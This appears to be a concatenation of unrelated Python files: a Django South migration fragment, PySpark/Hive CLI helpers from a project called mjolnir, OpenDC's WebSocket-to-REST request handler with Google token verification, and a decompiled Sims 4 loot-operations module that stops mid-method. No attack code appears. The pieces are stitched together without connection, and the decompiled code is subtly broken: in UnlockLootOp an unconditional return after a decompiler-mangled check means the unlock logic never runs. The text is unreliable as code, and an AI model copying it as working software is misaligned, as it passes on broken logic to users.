'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'projects.file': {
'Meta': {'ordering': "('denormalized_path',)", 'object_name': 'File'},
'content': ('django.db.models.fields.TextField', [], {}),
'denormalized_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'heading': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ordering': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['projects.File']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'files'", 'to': "orm['projects.Project']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'})
},
'projects.filerevision': {
'Meta': {'ordering': "('-revision_number',)", 'object_name': 'FileRevision'},
'comment': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'diff': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'file': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['projects.File']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_reverted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'revision_number': ('django.db.models.fields.IntegerField', [], {})
},
'projects.project': {
'Meta': {'ordering': "('-modified_date', 'name')", 'object_name': 'Project'},
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'docs_directory': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'extensions': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "'.rst'", 'max_length': '10'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '20'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects'", 'to': "orm['auth.User']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
}
}
complete_apps = ['projects']
|
"""CLI application definition helpers
Implements CLI argument handling for transformation
utilities.
"""
from argparse import ArgumentParser
from collections import OrderedDict
from functools import wraps
import json
import os
from typing import cast, Callable, Dict, List, Mapping, Optional
import uuid
try:
from pyspark.sql import DataFrame, SparkSession
except ImportError as ex:
try:
import findspark
except ImportError:
# If findspark isn't available re-raise the original error
raise ex
else:
findspark.init()
from pyspark.sql import DataFrame, SparkSession
from mjolnir.utils import as_output_file, hdfs_open_read, hdfs_rmdir
import mjolnir.transform as mt
METADATA_FILE_NAME = '_METADATA.JSON'
def write_metadata(dir_path, metadata) -> None:
file_path = os.path.join(dir_path, METADATA_FILE_NAME)
with as_output_file(file_path, overwrite=True) as f:
json.dump(metadata, f)
def read_metadata(dir_path) -> Mapping:
file_path = os.path.join(dir_path, METADATA_FILE_NAME)
with hdfs_open_read(file_path) as f:
return json.load(f)
def _wiki_features(df: DataFrame, wiki: str) -> List[str]:
meta = df.schema['features'].metadata
if 'wiki_features' in meta:
return meta['wiki_features'][wiki]
else:
return meta['features']
def feature_vector_stats(df: DataFrame) -> Mapping:
"""Calculate stats of feature vector partitions necessary for executor auto-sizing
Expects the input dataframe to either be cached, or read directly from
disk. Will iterate over the dataframe multiple times. Signature matches
stats_fn of write_partition function.
"""
num_obs = {row['wikiid']: row['count']
for row in df.groupBy('wikiid').count().collect()}
features = {wiki: _wiki_features(df, wiki) for wiki in num_obs.keys()}
return {'num_obs': num_obs, 'wiki_features': features}
class HivePartition:
def __init__(self, spark, table, partition_spec, direct_parquet_read=False):
self._spark = spark
self.table = table
self.partition_spec = partition_spec
self._df = cast(Optional[DataFrame], None)
self._metadata = cast(Optional[Mapping], None)
self._direct_parquet_read = direct_parquet_read
@property
def df(self) -> DataFrame:
"""Pyspark dataframe for specified partition"""
if self._df is None:
self._df = mt.read_partition(
self._spark, self.table, self.partition_spec,
direct_parquet_read=self._direct_parquet_read)
return self._df
@property
def input_dir(self) -> str:
"""Path to partition data"""
paths = list(self.df._jdf.inputFiles()) # type: ignore
dirs = {os.path.dirname(path) for path in paths}
if len(dirs) != 1:
raise Exception('multiple paths for [{}] [{}]: {}'.format(
self.table, self.partition_spec, ','.join(dirs)))
return next(iter(dirs))
@property
def metadata(self) -> Mapping:
"""Mjolnir specific metadata for specified partition"""
if self._metadata is None:
self._metadata = read_metadata(self.input_dir)
return self._metadata
def partition_value(self, key):
"""Lookup value in partition key/value pairs"""
return dict(self.partition_spec)[key]
class CallQueue:
def __init__(self):
self._queue = []
def __call__(self, *args, **kwargs):
while self._queue:
fn = self._queue.pop(0)
fn(*args, **kwargs)
def append(self, fn):
self._queue.append(fn)
return fn
class Cli:
def __init__(self, name: str, transformer: Callable, parser: ArgumentParser):
self.name = name
self.transformer = transformer
self.parser = parser
self._post_process_args = CallQueue()
self._post_process_transform = CallQueue()
self._cleanup = CallQueue()
# Default args for all scripts
self.add_argument('--date', required=True)
def __call__(self, **kwargs):
spark = SparkSession.builder.getOrCreate()
self._post_process_args(spark, kwargs)
try:
maybe_df = self.transformer(spark=spark, **kwargs)
self._post_process_transform(maybe_df, kwargs)
finally:
self._cleanup()
@wraps(ArgumentParser.add_argument)
def add_argument(self, *args, **kwargs):
return self.parser.add_argument(*args, **kwargs)
def require_kafka_arguments(self):
self.add_argument('--brokers', required=True)
self.add_argument('--topic-request', required=True)
self.add_argument('--topic-response', required=True)
def require_daily_input_table(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['df_in'] = spark.read.table(kwargs['input_table']) \
.drop('year', 'month', 'day')
self.add_argument('--input-table', required=True)
def require_query_clicks_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['query_clicks'] = HivePartition(
spark, kwargs['clicks_table'], {
'date': kwargs['date'],
})
self.add_argument('--clicks-table', required=True)
def require_query_clustering_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['query_clustering'] = HivePartition(
spark, kwargs['clustering_table'], {
'date': kwargs['date'],
'algorithm': kwargs['clustering_algorithm'],
})
self.add_argument('--clustering-table', required=True)
self.add_argument('--clustering-algorithm', required=True)
def require_labeled_query_page_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['labeled_query_page'] = HivePartition(
spark, kwargs['labels_table'], {
'date': kwargs['date'],
'algorithm': kwargs['labeling_algorithm'],
})
self.add_argument('--labels-table', required=True)
self.add_argument('--labeling-algorithm')
def require_feature_vectors_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['feature_vectors'] = HivePartition(
spark, kwargs['feature_vectors_table'], {
'date': kwargs['date'],
'feature_set': kwargs['feature_set']
}, direct_parquet_read=True)
self.add_argument('--feature-vectors-table', required=True)
self.add_argument('--feature-set', required=True)
def require_training_files_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['training_files'] = read_metadata(
kwargs['training_files_path'])
self.add_argument('--training-files-path', required=True)
def require_model_parameters_partition(self, only_table=False):
self.add_argument('--model-parameters-table', required=True)
if not only_table:
raise NotImplementedError("TODO")
@staticmethod
def _resolve_partition_spec(kwargs, partition_spec_spec) -> Dict[str, str]:
# Bypass, typically repeating an input partitions
# partition spec.
if callable(partition_spec_spec):
return OrderedDict(partition_spec_spec(kwargs))
# Partition always starts with date
partition_spec = cast(Dict[str, str], OrderedDict())
partition_spec['date'] = kwargs['date']
for k, v in partition_spec_spec:
partition_spec[k] = v.format(**kwargs)
return partition_spec
def require_output_table(
self, partition_spec_spec, metadata_fn=None,
mode='overwrite',
):
@self._post_process_transform.append
def post(df: DataFrame, kwargs: Dict):
mt.write_partition(
df, kwargs['output_table'], kwargs['output_path'],
self._resolve_partition_spec(kwargs, partition_spec_spec),
mode=mode)
if metadata_fn is not None:
spark = df.sql_ctx.sparkSession
metadata = metadata_fn(spark.read.parquet(kwargs['output_path']))
write_metadata(kwargs['output_path'], metadata)
self.add_argument('--output-table', required=True)
self.add_argument('--output-path', required=True)
def require_temp_dir(self):
state = {}
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict):
state['temp_dir'] = '{}-temp-{}'.format(
kwargs['output_path'], uuid.uuid1())
kwargs['temp_dir'] = state['temp_dir']
@self._cleanup.append
def cleanup():
try:
hdfs_rmdir(state['temp_dir'])
except Exception:
pass
def require_output_metadata(self):
@self._post_process_transform.append
def post(metadata: Mapping, kwargs: Dict):
write_metadata(kwargs['output_path'], metadata)
self.add_argument('--output-path', required=True)
|
<reponame>Koen1999/opendc<filename>opendc-web/opendc-web-api/opendc/util/rest.py<gh_stars>0
import importlib
import json
import os
from oauth2client import client, crypt
from opendc.util import exceptions, parameter_checker
from opendc.util.exceptions import ClientError
class Request:
"""WebSocket message to REST request mapping."""
def __init__(self, message=None):
""""Initialize a Request from a socket message."""
# Get the Request parameters from the message
if message is None:
return
try:
self.message = message
self.id = message['id']
self.path = message['path']
self.method = message['method']
self.params_body = message['parameters']['body']
self.params_path = message['parameters']['path']
self.params_query = message['parameters']['query']
self.token = message['token']
except KeyError as exception:
raise exceptions.MissingRequestParameterError(exception)
# Parse the path and import the appropriate module
try:
self.path = message['path'].strip('/')
module_base = 'opendc.api.{}.endpoint'
module_path = self.path.replace('{', '').replace('}', '').replace('/', '.')
self.module = importlib.import_module(module_base.format(module_path))
except ImportError as e:
print(e)
raise exceptions.UnimplementedEndpointError('Unimplemented endpoint: {}.'.format(self.path))
# Check the method
if self.method not in ['POST', 'GET', 'PUT', 'PATCH', 'DELETE']:
raise exceptions.UnsupportedMethodError('Non-rest method: {}'.format(self.method))
if not hasattr(self.module, self.method):
raise exceptions.UnsupportedMethodError('Unimplemented method at endpoint {}: {}'.format(
self.path, self.method))
# Verify the user
if "OPENDC_FLASK_TESTING" in os.environ:
self.google_id = 'test'
return
try:
self.google_id = self._verify_token(self.token)
except crypt.AppIdentityError as e:
raise exceptions.AuthorizationTokenError(e)
def check_required_parameters(self, **kwargs):
"""Raise an error if a parameter is missing or of the wrong type."""
try:
parameter_checker.check(self, **kwargs)
except exceptions.ParameterError as e:
raise ClientError(Response(400, str(e)))
def process(self):
"""Process the Request and return a Response."""
method = getattr(self.module, self.method)
try:
response = method(self)
except ClientError as e:
e.response.id = self.id
return e.response
response.id = self.id
return response
def to_JSON(self):
"""Return a JSON representation of this Request"""
self.message['id'] = 0
self.message['token'] = None
return json.dumps(self.message)
@staticmethod
def _verify_token(token):
"""Return the ID of the signed-in user.
Or throw an Exception if the token is invalid.
"""
try:
id_info = client.verify_id_token(token, os.environ['OPENDC_OAUTH_CLIENT_ID'])
except Exception as e:
print(e)
raise crypt.AppIdentityError('Exception caught trying to verify ID token: {}'.format(e))
if id_info['aud'] != os.environ['OPENDC_OAUTH_CLIENT_ID']:
raise crypt.AppIdentityError('Unrecognized client.')
if id_info['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
raise crypt.AppIdentityError('Wrong issuer.')
return id_info['sub']
class Response:
"""Response to websocket mapping"""
def __init__(self, status_code, status_description, content=None):
"""Initialize a new Response."""
self.id = 0
self.status = {'code': status_code, 'description': status_description}
self.content = content
def to_JSON(self):
""""Return a JSON representation of this Response"""
data = {'id': self.id, 'status': self.status}
if self.content is not None:
data['content'] = self.content
return json.dumps(data, default=str)
|
<filename>Scripts/simulation/interactions/utils/loot_ops.py
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\interactions\utils\loot_ops.py
# Compiled at: 2020-11-14 02:32:50
# Size of source mod 2**32: 64157 bytes
import random
from protocolbuffers import Consts_pb2, UI_pb2, DistributorOps_pb2
from protocolbuffers.DistributorOps_pb2 import SetWhimBucks
from protocolbuffers.InteractionOps_pb2 import TravelSimsToZone
from clock import ClockSpeedMode
from distributor.ops import BreakThroughMessage, GenericProtocolBufferOp
from distributor.system import Distributor
from event_testing.resolver import SingleActorAndObjectResolver, SingleObjectResolver
from event_testing.tests import TunableTestSet
from interactions import ParticipantType, ParticipantTypeSingleSim
from interactions.utils import LootType
from interactions.utils.loot_basic_op import BaseLootOperation, BaseTargetedLootOperation
from objects.components import types
from objects.components.inventory_enums import InventoryType
from objects.components.portal_lock_data import LockAllWithGenusException, LockAllWithSimIdExceptionData, LockAllWithSituationJobExceptionData, LockRankedStatisticData
from objects.components.portal_locking_enums import LockPriority, LockType, ClearLock
from objects.components.spawner_component_enums import SpawnerType
from objects.components.state import TunableStateValueReference
from objects.gallery_tuning import ContentSource
from objects.slot_strategy import SlotStrategyVariant
from sims.funds import FundsSource, get_funds_for_source
from sims.unlock_tracker import TunableUnlockVariant
from sims4 import math
from sims4.tuning.tunable import Tunable, TunableRange, TunableReference, OptionalTunable, TunableRealSecond, TunableVariant, TunableEnumEntry, TunableList, TunableFactory, HasTunableSingletonFactory, AutoFactoryInit, TunablePackSafeReference, TunableTuple, TunableEnumSet
from traits.trait_type import TraitType
from tunable_multiplier import TunableMultiplier
from ui.notebook_tuning import NotebookSubCategories
from ui.ui_dialog import UiDialogOk, CommandArgType
from ui.ui_dialog_labeled_icons import UiDialogAspirationProgress
from ui.ui_dialog_notification import UiDialogNotification
import build_buy, distributor.system, enum, event_testing, services, sims4.log, sims4.resources, tag, telemetry_helper, venues.venue_constants
logger = sims4.log.Logger('LootOperations')
FLOAT_TO_PERCENT = 0.01
TELEMETRY_GROUP_LOOT_OPS = 'LOOT'
TELEMETRY_HOOK_DETECTIVE_CLUE = 'DECL'
TELEMETRY_DETECTIVE_CLUE_FOUND = 'clue'
loot_op_telemetry_writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_LOOT_OPS)
class BaseGameLootOperation(BaseLootOperation):
FACTORY_TUNABLES = {'locked_args': {'advertise': False}}
class LifeExtensionLootOp(BaseLootOperation):
class RestoreDaysFromAgingProgress(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'days_to_restore': TunableRange(tunable_type=int,
default=0,
minimum=0)}
def perform(self, subject, *_, **__):
subject.decrement_age_progress(self.days_to_restore)
class ResetAgingProgressInCategory(HasTunableSingletonFactory, AutoFactoryInit):
def perform(self, subject, *_, **__):
subject.reset_age_progress()
class AddDaysToAgingProgress(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'days_to_add': TunableRange(tunable_type=int,
default=0,
minimum=0)}
def perform(self, subject, *_, **__):
subject.increment_age_progress(self.days_to_add)
class FillAgingProgressInCategory(HasTunableSingletonFactory, AutoFactoryInit):
def perform(self, subject, *_, **__):
subject.fill_age_progress()
FACTORY_TUNABLES = {'bonus_days':TunableRange(description="\n Number of bonus days to be granted to the target's life.\n ",
tunable_type=int,
default=1,
minimum=0),
'modify_aging_progress':TunableVariant(description='\n If enabled, this loot will modify aging progress of a sim.\n ',
restore_days_from_aging_progress=RestoreDaysFromAgingProgress.TunableFactory(),
reset_aging_progress_in_category=ResetAgingProgressInCategory.TunableFactory(),
add_days_to_aging_progress=AddDaysToAgingProgress.TunableFactory(),
fill_aging_progress_in_category=FillAgingProgressInCategory.TunableFactory(),
locked_args={'disabled': None},
default='disabled')}
def __init__(self, bonus_days, modify_aging_progress, **kwargs):
(super().__init__)(**kwargs)
self.bonus_days = bonus_days
self.modify_aging_progress = modify_aging_progress
@property
def loot_type(self):
return LootType.LIFE_EXTENSION
def _apply_to_subject_and_target(self, subject, target, resolver):
subject.add_bonus_days(self.bonus_days)
if self.modify_aging_progress is not None:
self.modify_aging_progress.perform(subject)
class StateChangeLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'description':'\n This loot will change the state of the subject.\n ',
'state_value':TunableStateValueReference(),
'force_update':Tunable(description="\n If checked, force update the subject's state.\n ",
tunable_type=bool,
default=False)}
@TunableFactory.factory_option
def subject_participant_type_options(**kwargs):
return {'subject': TunableVariant(description='\n The subject of this loot.\n ',
participant=TunableEnumEntry(description='"\n The participant type for the subject of this loot.\n ',
tunable_type=ParticipantType,
default=(ParticipantType.Actor),
invalid_enums=(
ParticipantType.Invalid,)),
all_objects_with_tag=TunableEnumEntry(description='\n All objects with this tag.\n ',
tunable_type=(tag.Tag),
default=(tag.Tag.INVALID),
invalid_enums=(
tag.Tag.INVALID,)),
default='participant')}
def __init__(self, state_value, force_update, **kwargs):
(super().__init__)(**kwargs)
self.state_value = state_value
self.force_update = force_update
def _apply_to_subject_and_target(self, subject, target, resolver):
subject_obj = self._get_object_from_recipient(subject)
if subject_obj is not None:
state_value = self.state_value
subject_obj.set_state((state_value.state), state_value, force_update=(self.force_update))
class DialogLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'dialog': TunableVariant(description='\n Type of dialog to show.\n ',
notification=UiDialogNotification.TunableFactory(description='\n This text will display in a notification pop up when completed.\n '),
dialog_ok=UiDialogOk.TunableFactory(description='\n Display a dialog with an okay button.\n '),
aspiration_progress=UiDialogAspirationProgress.TunableFactory(description="\n Display a dialog that will show the Sim's progress towards one\n or more aspirations.\n "),
default='notification')}
def __init__(self, dialog, **kwargs):
(super().__init__)(**kwargs)
self.dialog = dialog
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject is not None:
if not services.current_zone().is_zone_loading:
owner = subject if subject.is_sim else services.get_active_sim()
if owner is not None:
if owner.is_selectable:
dialog = self.dialog(owner, resolver)
dialog.show_dialog(event_id=(self.dialog.factory.DIALOG_MSG_TYPE))
class AddTraitLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'description':'\n This loot will add the specified trait.\n ',
'trait':TunableReference(description='\n The trait to be added.\n ',
manager=services.get_instance_manager(sims4.resources.Types.TRAIT))}
def __init__(self, trait, **kwargs):
(super().__init__)(**kwargs)
self._trait = trait
def _apply_to_subject_and_target(self, subject, target, resolver):
subject.add_trait(self._trait)
class RemoveTraitLootOp(BaseLootOperation):
class _BaseRemoveTrait(HasTunableSingletonFactory, AutoFactoryInit):
def get_traits_to_remove(self, subject, target, resolver):
raise NotImplementedError('Attempting to use the _BaseRemoveTrait base class, use sub-classes instead.')
class _RemoveSpecificTrait(_BaseRemoveTrait):
FACTORY_TUNABLES = {'specific_trait': TunablePackSafeReference(description='\n The trait to be removed.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.TRAIT)))}
def get_traits_to_remove(self, subject, target, resolver):
return (
self.specific_trait,)
class _RemoveRandomTrait(_BaseRemoveTrait):
FACTORY_TUNABLES = {'trait_type': TunableEnumEntry(default=(TraitType.PERSONALITY),
tunable_type=TraitType,
invalid_enums=(TraitType.PERSONALITY))}
def get_traits_to_remove(self, subject, target, resolver):
trait_to_remove = None
traits_to_consider = [trait for trait in subject.trait_tracker if trait.trait_type == self.trait_type]
if traits_to_consider:
trait_to_remove = random.choice(traits_to_consider)
else:
logger.warn('_RemoveRandomTrait could not find a valid trait to remove.')
return (trait_to_remove,)
class _RemoveRandomPersonalityTrait(_BaseRemoveTrait):
FACTORY_TUNABLES = {'traits_to_not_consider': TunableList(description='\n Personality traits that should not be considered for removal. Leave\n blank to consider all personality traits.\n ',
tunable=TunableReference(description='\n A personality trait that should not be removed.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.TRAIT)),
pack_safe=True))}
def get_traits_to_remove(self, subject, target, resolver):
trait_to_remove = None
personality_traits_to_consider = [trait for trait in subject.trait_tracker.personality_traits if trait not in self.traits_to_not_consider]
if personality_traits_to_consider:
trait_to_remove = random.choice(personality_traits_to_consider)
else:
logger.warn('RemoveRandomPersonalityTraitLootOp could not find a valid personality trait to remove.')
return (trait_to_remove,)
class _RemoveTraitsOfType(_BaseRemoveTrait):
FACTORY_TUNABLES = {'trait_types': TunableEnumSet(description='\n A set of trait types to find and remove.\n ',
enum_type=TraitType,
enum_default=(TraitType.GAMEPLAY),
allow_empty_set=False)}
def get_traits_to_remove(self, subject, target, resolver):
trait_tracker = subject.trait_tracker
if trait_tracker is None:
return ()
traits = []
for trait_type in self.trait_types:
traits.extend(trait_tracker.get_traits_of_type(trait_type))
return traits
FACTORY_TUNABLES = {'trait': TunableVariant(description='\n Type of trait removal to perform.\n ',
specific_trait=(_RemoveSpecificTrait.TunableFactory()),
random_personality_trait=(_RemoveRandomPersonalityTrait.TunableFactory()),
random_trait=(_RemoveRandomTrait.TunableFactory()),
traits_of_type=(_RemoveTraitsOfType.TunableFactory()),
default='specific_trait')}
def __init__(self, trait, **kwargs):
(super().__init__)(**kwargs)
self._trait = trait
def _apply_to_subject_and_target(self, subject, target, resolver):
traits_to_remove = self._trait.get_traits_to_remove(subject, target, resolver)
for trait_to_remove in traits_to_remove:
if trait_to_remove is not None:
subject.remove_trait(trait_to_remove)
class HouseholdFundsInterestLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'description':'\n This loot will deliver interest income to the current Household for their current funds,\n based on the percentage tuned against total held. \n ',
'interest_rate':Tunable(description='\n The percentage of interest to apply to current funds.\n ',
tunable_type=int,
default=0),
'notification':OptionalTunable(description='\n If enabled, this notification will display when this interest payment is made.\n Token 0 is the Sim - i.e. {0.SimFirstName}\n Token 1 is the interest payment amount - i.e. {1.Money}\n ',
tunable=UiDialogNotification.TunableFactory())}
def __init__(self, interest_rate, notification, **kwargs):
(super().__init__)(**kwargs)
self._interest_rate = interest_rate
self._notification = notification
def _apply_to_subject_and_target(self, subject, target, resolver):
pay_out = int(subject.household.funds.money * self._interest_rate * FLOAT_TO_PERCENT)
subject.household.funds.add(pay_out, Consts_pb2.TELEMETRY_INTERACTION_REWARD, self._get_object_from_recipient(subject))
if self._notification is not None:
dialog = self._notification(subject, resolver)
dialog.show_dialog(event_id=(self._notification.factory.DIALOG_MSG_TYPE), additional_tokens=(
pay_out,))
class FireLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'fire_count': TunableRange(description='\n The number of fires to create. Because of placement restrictions or fire availability, \n there is no guarantee that this many fires will be created.\n ',
tunable_type=int,
default=1,
minimum=1,
maximum=10)}
def __init__(self, fire_count, **kwargs):
(super().__init__)(**kwargs)
self._fire_count = fire_count
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject is None:
logger.error('Invalid subject specified for this loot operation. {} Please fix in tuning.', self)
return
subject_obj = self._get_object_from_recipient(subject)
if subject_obj is None:
logger.error('No valid object for subject specified for this loot operation. {} Please fix in tuning.', resolver)
return
fire_service = services.get_fire_service()
fire_service.spawn_fire_at_object(subject_obj, num_fires=(self._fire_count))
class UnlockLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'unlock_item':TunableUnlockVariant(description='\n The unlock item that will be given to the Sim.\n Note that if the item has a custom name, it will not be persisted through the Gallery.\n '),
'notification':OptionalTunable(description='\n If enabled, this notification will display when the item is unlocked.\n The display name of the unlock will be added as a string token.\n ',
tunable=UiDialogNotification.TunableFactory())}
def __init__(self, unlock_item, notification, **kwargs):
(super().__init__)(**kwargs)
self._unlock_item = unlock_item
self._notification = notification
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject is None:
logger.error('Subject {} is None for the loot {}..', self.subject, self)
return
else:
subject.is_sim or logger.error('Subject {} is not Sim for the loot {}.', self.subject, self)
return
if subject.unlock_tracker is None:
return
if self._unlock_item is None:
return
mark_as_new = getattr(self._unlock_item, 'unlock_as_new', False)
subject.unlock_tracker.add_unlock((self._unlock_item), None, mark_as_new=mark_as_new)
if self._notification is not None:
dialog = self._notification(subject, resolver)
dialog.show_dialog(event_id=(self._notification.factory.DIALOG_MSG_TYPE), response_command_tuple=(
CommandArgType.ARG_TYPE_INT, subject.sim_id),
additional_tokens=(
self._unlock_item.get_display_name(subject),))
class CollectibleShelveItem(BaseLootOperation):
def __init__(self, *args, **kwargs):
(super().__init__)(args, target_participant_type=ParticipantType.Object, **kwargs)
def _apply_to_subject_and_target(self, subject, target, resolver):
target_slot = subject.get_collectible_slot()
if target_slot:
for runtime_slot in target.get_runtime_slots_gen(bone_name_hash=(sims4.hash_util.hash32(target_slot))):
if runtime_slot and runtime_slot.empty:
runtime_slot.add_child(subject)
return True
return False
class FireDeactivateSprinklerLootOp(BaseLootOperation):
def _apply_to_subject_and_target(self, subject, target, resolver):
fire_service = services.get_fire_service()
if fire_service is not None:
fire_service.deactivate_sprinkler_system()
class ExtinguishNearbyFireLootOp(BaseLootOperation):
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject is None:
logger.error('Subject {} is None for the loot {}..', self.subject, self)
return
fire_service = services.get_fire_service()
if fire_service is None:
logger.error('Fire Service in none when calling the lootop: {}.', self)
return
subject = self._get_object_from_recipient(subject)
fire_service.extinguish_nearby_fires(subject)
return True
class AwardWhimBucksLootOp(BaseLootOperation):
FACTORY_TUNABLES = {'description':'\n This loot will give the specified number of whim bucks to the sim. \n ',
'whim_bucks':TunableRange(description='\n The number of whim bucks to give.\n ',
tunable_type=int,
default=1,
minimum=1)}
def __init__(self, whim_bucks, **kwargs):
(super().__init__)(**kwargs)
self._whim_bucks = whim_bucks
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject is None:
logger.error('Subject {} is None for the loot {}..', self.subject, self)
return False
subject.add_whim_bucks(self._whim_bucks, SetWhimBucks.COMMAND)
class RefreshWhimsLootOp(BaseLootOperation):
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject is None:
logger.error('Subject {} is None for the loot {}..', self.subject, self)
return
if subject.whim_tracker is None:
return
subject.whim_tracker.refresh_whims()
class RefreshInventoryItemsDecayModifiers(BaseLootOperation):
FACTORY_TUNABLES = {'inventory_types':TunableList(description='\n List of inventory type that we need to refresh. Inventory item object\n which currently is in one of this inventory types will be refreshed.\n ',
tunable=TunableEnumEntry(description='\n The type of inventory.\n ',
tunable_type=InventoryType,
default=(InventoryType.UNDEFINED),
pack_safe=True)),
'locked_args':{'subject': None}}
def __init__(self, *args, inventory_types, **kwargs):
(super().__init__)(*args, **kwargs)
self.inventory_types = inventory_types
def _apply_to_subject_and_target(self, subject, target, resolver):
inventory_manager = services.inventory_manager()
for obj in inventory_manager.objects:
inventory_item_component = obj.inventoryitem_component
inventory_type = inventory_item_component.current_inventory_type
if inventory_type is not None and inventory_type in self.inventory_types:
inventory_item_component.refresh_decay_modifiers()
class DiscoverClueLootOp(BaseTargetedLootOperation):
FACTORY_TUNABLES = {'career_reference':TunableReference(description='\n A reference to the detective career that keeps track of what clues\n to display to the player.\n ',
manager=services.get_instance_manager(sims4.resources.Types.CAREER),
class_restrictions=('DetectiveCareer', )),
'fallback_actions':TunableReference(description='\n List of loot actions that will occur if there are no more clues to\n be discovered. This can be used to hook up a notification, for\n example.\n ',
manager=services.get_instance_manager(sims4.resources.Types.ACTION),
allow_none=True,
class_restrictions=('LootActions', 'RandomWeightedLoot'))}
def __init__(self, *args, career_reference, fallback_actions, **kwargs):
(super().__init__)(*args, **kwargs)
self.career_reference = career_reference
self.fallback_actions = fallback_actions
@property
def loot_type(self):
return LootType.DISCOVER_CLUE
def _apply_to_subject_and_target(self, subject, target, resolver):
if subject.notebook_tracker is None:
logger.warn("Trying to award a DiscoverClueLootOp to {}, but they don't have a notebook. LOD issue?", subject)
return
else:
career = subject.careers.get(self.career_reference.guid64)
if career is None:
logger.error('Failed to find career {} on Sim {}.', (self.career_reference),
subject, owner='bhill')
return
clue = career.pop_unused_clue()
if clue is None:
if self.fallback_actions:
